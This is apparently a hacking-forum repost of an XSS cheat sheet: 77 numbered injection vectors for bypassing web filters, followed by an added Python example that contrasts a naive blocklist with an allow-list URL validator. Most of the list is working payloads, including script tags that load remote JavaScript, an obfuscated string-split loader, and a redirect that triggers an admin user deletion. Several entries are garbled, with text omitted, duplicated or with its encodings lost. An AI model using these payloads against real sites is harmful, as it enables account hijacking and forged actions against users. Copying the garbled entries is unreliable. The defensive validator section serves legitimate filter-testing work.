12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6

It seems there isn't much XSS material on t00ls, so I'm copying over some good stuff I came across; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (everything on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective domestically, since there's nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash lets you smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT ="&gt;" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
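From a defender's side, the recurring lesson in entries (3)-(14), (17) and (40) is that a substring blocklist on "javascript:" is defeated by case changes, HTML character references (with or without semicolons), embedded tabs/newlines and null bytes. The following is an added example, not part of the post above or of the original cheat sheet, showing why: it runs a naive blocklist and an allow-list validator over constructed attribute values modelled on those entries. The validator decodes character references, strips C0 control characters and spaces the way a browser ignores them when reading a scheme, lower-cases, and then only accepts relative URLs or an explicit http/https scheme. The sample values, the function names and the "relative URLs are acceptable" policy are all assumptions of this example.

```python
import html
import re

# Constructed sample values for a URL-bearing attribute (SRC/HREF), modelled on
# the javascript: obfuscations in the list above. All samples are constructed.
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "entity_decimal": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "entity_hex_no_semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded_tab": "jav\tascript:alert('XSS')",
    "embedded_newline": "jav\nascript:alert('XSS')",
    "leading_space": " javascript:alert('XSS')",
    "null_byte": "java\0script:alert('XSS')",
    "vbscript": "vbscript:msgbox('XSS')",
    "safe_http": "http://example.com/a.png",
    "safe_relative": "/images/a.png",
}

# Characters browsers drop or ignore while reading a URL scheme: C0 controls,
# space and DEL. Removing them before matching defeats the tab/newline/null
# variants above.
_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")
# A URL scheme per RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":"
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
ALLOWED_SCHEMES = {"http", "https"}


def naive_filter(value: str) -> bool:
    """Substring blocklist of the kind the variants above defeat.
    Returns True when the value is *accepted*."""
    return "javascript:" not in value


def normalize(value: str) -> str:
    """Decode HTML character references (with or without the trailing
    semicolon), strip control characters and spaces, and lower-case."""
    decoded = html.unescape(value)
    stripped = _CONTROL_OR_SPACE.sub("", decoded)
    return stripped.lower()


def is_safe_url(value: str) -> bool:
    """Allow-list check: after normalization accept only scheme-less
    (relative) URLs or an explicit http/https scheme; everything else,
    including javascript:, vbscript: and data:, is rejected."""
    norm = normalize(value)
    match = _SCHEME.match(norm)
    if match is None:
        return True  # no scheme -> relative URL (assumed acceptable policy)
    return match.group(1) in ALLOWED_SCHEMES


def naive_misses() -> list:
    """Names of samples the blocklist accepts but the allow-list rejects."""
    return sorted(name for name, value in SAMPLES.items()
                  if naive_filter(value) and not is_safe_url(value))


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:24} blocklist={naive_filter(value)!s:5} "
              f"allowlist={is_safe_url(value)}")
    print("blocklist misses:", naive_misses())
```

Note that the normalized string is used only to classify the scheme; the original value is what you would store or emit, after context-appropriate output encoding. Protocol-relative values such as //host/path pass as "relative" here, so a deployment that must keep users on its own origin should additionally resolve the value against the site base URL and compare hosts.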